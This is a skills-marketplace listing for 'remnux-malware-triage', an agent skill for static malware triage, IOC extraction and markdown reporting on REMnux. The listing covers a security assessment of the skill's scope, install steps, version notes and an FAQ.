← Back to Skills Marketplace
172
Downloads
0
Stars
0
Active Installs
1
Versions
Install in OpenClaw
/install remnux-malware-triage
Description
perform concise malware triage, focused IOC extraction, infrastructure hunting, and markdown report writing on remnux when the user supplies a suspicious fil...
Usage Guidance
This skill appears to be what it claims: a REMnux-focused triage helper that reads user-supplied samples and writes a concise markdown report. Before installing or invoking it, verify: 1) you will run it in a REMnux environment (or equivalent) that provides the analysis tools it expects; 2) you are comfortable letting the agent access only the specific files/attachments you supply (don't give unrelated sensitive paths); 3) the report output path (/home/remnux/files/output) is acceptable and writable; and 4) you explicitly approve any dynamic execution or external submissions — the skill says it will not perform those without your consent. If you need stricter guarantees, ask the skill owner for an explicit list of required binaries and permission boundaries.
Capability Analysis
Type: OpenClaw Skill
Name: remnux-malware-triage
Version: 1.0.0
The remnux-malware-triage skill bundle is a legitimate toolset designed for structured malware analysis and triage on a REMnux environment. The instructions in SKILL.md and references/triage-playbook.md emphasize safety, such as defanging network indicators, treating sample content as hostile, and requiring explicit user consent before performing dynamic analysis. The workflow is well-defined, focusing on local file analysis and reporting to a specific output directory (/home/remnux/files/output) without any indicators of malicious intent or data exfiltration.
Capability Assessment
Purpose & Capability
Name/description promise (REMnux triage, IOC extraction, concise reports) matches the SKILL.md and reference documents. The skill does not request unrelated credentials, system paths, or exotic installs — it expects a REMnux analysis environment and stays focused on triage tasks.
Instruction Scope
SKILL.md instructs the agent to read user-supplied files/attachments, compute hashes, inventory archives, and write a markdown report. This is appropriate for triage, but it assumes the platform will provide access to attachments and that writing to /home/remnux/files/output is allowed. The skill explicitly forbids dynamic execution or external submission unless the user requests it, which limits scope creep.
Install Mechanism
No install specification or external downloads — instruction-only skill. This minimizes installation risk; it relies on the host REMnux toolchain but does not attempt to fetch or execute third-party code.
Credentials
The skill requests no environment variables or credentials, which is proportionate. One caveat: it implicitly expects REMnux tooling to be present (e.g., hashing, static-analysis tools) but does not declare required binaries; users should ensure the execution environment actually provides those tools.
Persistence & Privilege
always is false and the skill does not request persistent system-wide privileges. It does write reports to a fixed path (/home/remnux/files/output), which is reasonable for its purpose but should be confirmed by the user.
How to Use
- Make sure OpenClaw is installed (local or Docker)
- Run the install command in chat:
/install remnux-malware-triage - After installation, invoke the skill by name or use
/remnux-malware-triage - Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.0
remnux-malware-triage 1.0.0 – Initial release
- Provides triage-first malware analysis on REMnux, focused on identifying primary payloads, extracting IOCs, and tracing infrastructure.
- Supports intake from file paths, hashes, or chat attachments and emphasizes correct artifact scoping.
- Follows a first-pass static analysis approach, escalating only if deeper investigation is justified or requested.
- Separates observed vs inferred indicators and clearly distinguishes unconfirmed IOCs.
- Outputs concise chat summaries and structured markdown reports to a dedicated output directory.
Metadata
Frequently Asked Questions
What is Malware Analyst?
perform concise malware triage, focused IOC extraction, infrastructure hunting, and markdown report writing on remnux when the user supplies a suspicious fil... It is an AI Agent Skill for Claude Code / OpenClaw, with 172 downloads so far.
How do I install Malware Analyst?
Run "/install remnux-malware-triage" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.
Is Malware Analyst free?
Yes, Malware Analyst is completely free, licensed under MIT-0. You can download, install and use it at no cost.
Which platforms does Malware Analyst support?
Malware Analyst is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).
Who created Malware Analyst?
It is built and maintained by nirhalfon (@nirhalfon); the current version is v1.0.0.
More Skills